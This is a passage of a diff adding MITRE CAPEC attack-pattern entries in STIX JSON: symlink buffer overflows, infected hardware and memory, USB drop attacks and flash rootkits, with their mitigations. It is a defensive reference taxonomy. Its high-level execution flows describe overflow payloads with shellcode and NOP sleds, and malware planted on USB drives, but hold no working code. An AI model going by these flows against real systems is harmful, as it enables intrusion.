"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-449", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/449.html" + } + ], + "id": "attack-pattern--3a127c86-c569-4de3-a328-1c1b45a9f986", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB Stick", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of symbolic links to cause buffer overflows. An adversary can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.", + "external_references": [ + { + "external_id": "CAPEC-45", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/45.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The EFTP server has a buffer overflow that can be exploited if an adversary uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the adversary uploads some content (the link file) and then the adversary causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program that might load in certain files to memory.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    The adversary creates or modifies a symbolic link pointing to those files which contain an excessive amount of data. If creating a symbolic link to one of those files causes different behavior in the application, then an injection vector has been identified.

  2. Craft overflow file content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the specially crafted file content, the adversary creates a symbolic link from the identified resource to the malicious file, causing a targeted buffer overflow attack.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary can create symbolic link on the target host.", + "The target host does not perform correct boundary checking while consuming data from a resources." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.", + "id": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecde6069-c1c7-4e95-bfbf-8d888d1da15e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c08d081e-5bc2-4eeb-bef2-5280baed888e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the resource pointed to by your symlink links (See attack pattern named \"Forced Symlink race\"), they can be replaced by malicious resources.", + "id": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d781109-18f4-4057-a1b2-2d53e821b317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always check the size of the input data before copying to a buffer.", + "id": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7487759c-c682-45d9-b902-871361800f52", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9762e554-038f-4527-b000-3e8e0d78fe26", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ce42f28-5f2d-4b83-8daf-869c4145268e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71106318-5e06-4db7-b209-bbf30b0020fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--84ae2ea4-df85-4853-b1f2-319992648876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-450", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/450.html" + } + ], + "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB U3 Autorun", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-451", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--64076ab3-d972-4688-b46b-76627923a8a0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via Infected Peripheral Device", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-452", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/452.html" + } + ], + "id": "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4" + ], + "x_capec_prerequisites": [ + "Access to the hardware currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-453", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/453.html" + } + ], + "id": "attack-pattern--a2eaa5c4-8d21-414a-9d49-08667f4c6427", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-454", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/454.html" + } + ], + "id": "attack-pattern--c18bf62a-4419-4606-9dbe-03ab63873b60", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Modification of Existing Components with Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-457 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-455", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/455.html" + } + ], + "id": "attack-pattern--55c6c2d2-1850-4263-97eb-e47c9b9a7a4b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Inclusion of Counterfeit Hardware Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-456", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/456.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + } + ], + "id": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Memory", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.", + "In 2007, approximately 1800 of Seagate's Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect stop operations with known virus.", + "id": "course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-456-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66815cc1-00b2-4e7e-b397-ae5fb384441e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "target_ref": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.", + "external_references": [ + { + "external_id": "CAPEC-457", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/457.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1299.html" + }, + { + "description": "Replication Through Removable Media", + "external_id": "T1091", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1091" + }, + { + "description": "Communication Through Removable Media", + "external_id": "T1092", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1092" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + } + ], + "id": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "USB Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target System: In certain cases, the adversary will explore an organization's network to determine a specific target machine to exploit based on the information it contains or privileges the main user may possess.

    2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Experiment

  1. Develop or Obtain malware and install on a USB device: The adversary develops or obtains the malicious software necessary to exploit the target system, which they then install on an external USB device such as a USB flash drive.

    2. Techniques
    The adversary can develop or obtain malware for to perform a variety of tasks such as sniffing network traffic or monitoring keystrokes.

Exploit

  1. Connect or deceive a user into connecting the infected USB device: Once the malware has been placed on an external USB device, the adversary connects the device to the target system or deceives a user into connecting the device to the target system such as in a USB Drop Attack.

    2. Techniques
    The adversary connects the USB device to a specified target system or performs a USB Drop Attack, hoping a user will find and connect the USB device on their own. Once the device is connected, the malware executes giving the adversary access to network traffic, credentials, etc.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of physical access to the device being attacked.", + "Information pertaining to the target organization on how to best execute a USB Drop Attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device themself.", + "id": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1223d74f-6652-40ea-92ee-4f1a2c91d676", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.", + "id": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83689bae-01f6-4ed3-b3f8-66cf8e657475", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not connect untrusted USB devices to systems connected on an organizational network. Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist.", + "id": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dfbd2aef-9f4e-43aa-819c-14c5b16d3c23", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device.", + "external_references": [ + { + "external_id": "CAPEC-458", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/458.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Robert Lemos, Researchers: Rootkits headed for BIOS, 2006, SecurityFocus", + "external_id": "REF-394", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Flash Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for \"flash\" based malware or malicious logic.\n One of the pernicious 